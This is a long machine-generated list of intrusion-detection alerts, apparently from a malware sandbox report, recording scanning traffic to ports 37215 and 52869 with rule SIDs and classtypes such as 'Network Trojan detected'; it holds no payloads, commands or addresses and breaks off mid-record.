                      Timestamp:07/20/24-23:01:11.817297
                      SID:2829579
                      Source Port:38628
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.704194
                      SID:2027339
                      Source Port:51816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.147883
                      SID:2027339
                      Source Port:39284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.893328
                      SID:2027339
                      Source Port:58992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.141192
                      SID:2027339
                      Source Port:58726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2829579
                      Source Port:38990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.110860
                      SID:2829579
                      Source Port:53424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.030401
                      SID:2831300
                      Source Port:36084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.260372
                      SID:2025132
                      Source Port:55702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.085627
                      SID:2027339
                      Source Port:42686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.694393
                      SID:2027339
                      Source Port:58076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.203130
                      SID:2025132
                      Source Port:38468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.557453
                      SID:2027339
                      Source Port:39592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2835222
                      Source Port:46002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.228794
                      SID:2025132
                      Source Port:42024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.342227
                      SID:2831300
                      Source Port:38380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.702437
                      SID:2831300
                      Source Port:36972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.061779
                      SID:2829579
                      Source Port:40284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2829579
                      Source Port:33456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.991143
                      SID:2829579
                      Source Port:55808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221301
                      SID:2829579
                      Source Port:49974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.034562
                      SID:2829579
                      Source Port:33016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.699598
                      SID:2831300
                      Source Port:43810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.863938
                      SID:2027339
                      Source Port:58594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.611391
                      SID:2027339
                      Source Port:48150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2829579
                      Source Port:32934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2835222
                      Source Port:52556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.490989
                      SID:2027339
                      Source Port:58100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.096837
                      SID:2831300
                      Source Port:41926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.156407
                      SID:2025132
                      Source Port:38898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.730531
                      SID:2025132
                      Source Port:45796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.319856
                      SID:2835222
                      Source Port:41910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.909111
                      SID:2835222
                      Source Port:57128
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.810790
                      SID:2027339
                      Source Port:45350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.656154
                      SID:2027339
                      Source Port:60622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.164161
                      SID:2027339
                      Source Port:42482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2829579
                      Source Port:59012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.877765
                      SID:2025132
                      Source Port:46094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.494643
                      SID:2025132
                      Source Port:55240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:26.019285
                      SID:2025132
                      Source Port:58760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.954688
                      SID:2027339
                      Source Port:36322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.883172
                      SID:2835222
                      Source Port:39746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321965
                      SID:2835222
                      Source Port:53252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.387850
                      SID:2027339
                      Source Port:50492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.594888
                      SID:2831300
                      Source Port:41116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.124696
                      SID:2835222
                      Source Port:42616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.571815
                      SID:2027339
                      Source Port:44764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.092270
                      SID:2027339
                      Source Port:57310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.347089
                      SID:2025132
                      Source Port:45246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.621955
                      SID:2027339
                      Source Port:40832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.275811
                      SID:2025132
                      Source Port:37202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.099799
                      SID:2027339
                      Source Port:43384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.085431
                      SID:2829579
                      Source Port:37978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.486106
                      SID:2025132
                      Source Port:32964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.985200
                      SID:2027339
                      Source Port:48044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.921490
                      SID:2027339
                      Source Port:52538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.356902
                      SID:2027339
                      Source Port:39898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2835222
                      Source Port:54948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.622797
                      SID:2027339
                      Source Port:55116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.318206
                      SID:2831300
                      Source Port:33518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.479337
                      SID:2027339
                      Source Port:45740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.380019
                      SID:2831300
                      Source Port:52180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.632393
                      SID:2835222
                      Source Port:45886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.931855
                      SID:2027339
                      Source Port:46010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.187842
                      SID:2835222
                      Source Port:52234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2829579
                      Source Port:59220
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2829579
                      Source Port:49030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634292
                      SID:2829579
                      Source Port:36066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.321505
                      SID:2025132
                      Source Port:44928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.650505
                      SID:2835222
                      Source Port:51726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.060991
                      SID:2835222
                      Source Port:39904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2829579
                      Source Port:58788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.735576
                      SID:2025132
                      Source Port:36248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.649775
                      SID:2835222
                      Source Port:33728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.588824
                      SID:2027339
                      Source Port:33420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.306318
                      SID:2027339
                      Source Port:39932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.188773
                      SID:2027339
                      Source Port:40180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.608031
                      SID:2025132
                      Source Port:43532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.933453
                      SID:2027339
                      Source Port:33282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.386032
                      SID:2025132
                      Source Port:41382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2829579
                      Source Port:59238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.290015
                      SID:2025132
                      Source Port:43800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.811667
                      SID:2027339
                      Source Port:36698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.072641
                      SID:2027339
                      Source Port:42140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2835222
                      Source Port:49292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.036421
                      SID:2027339
                      Source Port:35630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.995202
                      SID:2027339
                      Source Port:57242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.037758
                      SID:2027339
                      Source Port:58232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2835222
                      Source Port:51926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.817503
                      SID:2025132
                      Source Port:39336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.154068
                      SID:2835222
                      Source Port:52500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2829579
                      Source Port:60840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.489022
                      SID:2831300
                      Source Port:35434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.870348
                      SID:2027339
                      Source Port:39428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.813695
                      SID:2027339
                      Source Port:42064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2829579
                      Source Port:58978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2835222
                      Source Port:56934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.902509
                      SID:2027339
                      Source Port:44290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.175511
                      SID:2027339
                      Source Port:52488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.155894
                      SID:2831300
                      Source Port:43802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.946379
                      SID:2025132
                      Source Port:34982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.597662
                      SID:2027339
                      Source Port:36710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.799089
                      SID:2025132
                      Source Port:44900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.807536
                      SID:2027339
                      Source Port:37344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.918473
                      SID:2025132
                      Source Port:39424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.220949
                      SID:2835222
                      Source Port:53130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.245522
                      SID:2027339
                      Source Port:57362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.290518
                      SID:2027339
                      Source Port:49994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.912337
                      SID:2831300
                      Source Port:42548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.246775
                      SID:2025132
                      Source Port:59676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.822392
                      SID:2835222
                      Source Port:46852
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.444461
                      SID:2831300
                      Source Port:52970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.672544
                      SID:2831300
                      Source Port:34852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.377081
                      SID:2831300
                      Source Port:34994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.607815
                      SID:2831300
                      Source Port:59936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2835222
                      Source Port:56538
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.632393
                      SID:2835222
                      Source Port:37508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.743446
                      SID:2831300
                      Source Port:36894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.634606
                      SID:2027339
                      Source Port:60262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.148932
                      SID:2027339
                      Source Port:54090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.738271
                      SID:2025132
                      Source Port:34290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.646615
                      SID:2027339
                      Source Port:51990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322217
                      SID:2027339
                      Source Port:50420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.066716
                      SID:2831300
                      Source Port:43292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.202290
                      SID:2831300
                      Source Port:33930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.489480
                      SID:2027339
                      Source Port:45674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.322405
                      SID:2025132
                      Source Port:35100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.700808
                      SID:2027339
                      Source Port:55012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.164018
                      SID:2027339
                      Source Port:34592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2829579
                      Source Port:47744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.322860
                      SID:2829579
                      Source Port:42490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.150119
                      SID:2027339
                      Source Port:42464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.147727
                      SID:2027339
                      Source Port:38340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.995803
                      SID:2025132
                      Source Port:54222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.591832
                      SID:2027339
                      Source Port:45912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.510114
                      SID:2027339
                      Source Port:43984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.747554
                      SID:2025132
                      Source Port:57824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2835222
                      Source Port:57220
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.845560
                      SID:2027339
                      Source Port:43370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.450129
                      SID:2027339
                      Source Port:48682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.581974
                      SID:2831300
                      Source Port:59630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.652877
                      SID:2831300
                      Source Port:34774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2835222
                      Source Port:36096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.161892
                      SID:2829579
                      Source Port:52752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2829579
                      Source Port:37164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222091
                      SID:2829579
                      Source Port:55906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.986585
                      SID:2025132
                      Source Port:52706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.611774
                      SID:2027339
                      Source Port:59634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.001716
                      SID:2025132
                      Source Port:36388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.005156
                      SID:2829579
                      Source Port:60556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.660917
                      SID:2831300
                      Source Port:38730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.722161
                      SID:2027339
                      Source Port:43486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638305
                      SID:2829579
                      Source Port:48956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2835222
                      Source Port:36670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.255748
                      SID:2831300
                      Source Port:60794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.261026
                      SID:2831300
                      Source Port:51210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.631467
                      SID:2025132
                      Source Port:50728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:12.082957
                      SID:2027339
                      Source Port:33200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.286911
                      SID:2027339
                      Source Port:45074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.055900
                      SID:2027339
                      Source Port:38080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.130152
                      SID:2025132
                      Source Port:59250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.258056
                      SID:2027339
                      Source Port:44682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.256493
                      SID:2027339
                      Source Port:52512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982801
                      SID:2835222
                      Source Port:37172
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.546338
                      SID:2027339
                      Source Port:52250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.625081
                      SID:2027339
                      Source Port:59666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.179680
                      SID:2027339
                      Source Port:59814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.592030
                      SID:2027339
                      Source Port:53838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.750477
                      SID:2831300
                      Source Port:47958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.918137
                      SID:2025132
                      Source Port:35520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.109699
                      SID:2831300
                      Source Port:52936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.600782
                      SID:2025132
                      Source Port:56522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.906061
                      SID:2027339
                      Source Port:33136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.335096
                      SID:2831300
                      Source Port:52352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.246801
                      SID:2025132
                      Source Port:37326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.318206
                      SID:2027339
                      Source Port:57560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2829579
                      Source Port:58132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221803
                      SID:2829579
                      Source Port:50602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2829579
                      Source Port:54746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.157620
                      SID:2835222
                      Source Port:48022
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2829579
                      Source Port:42932
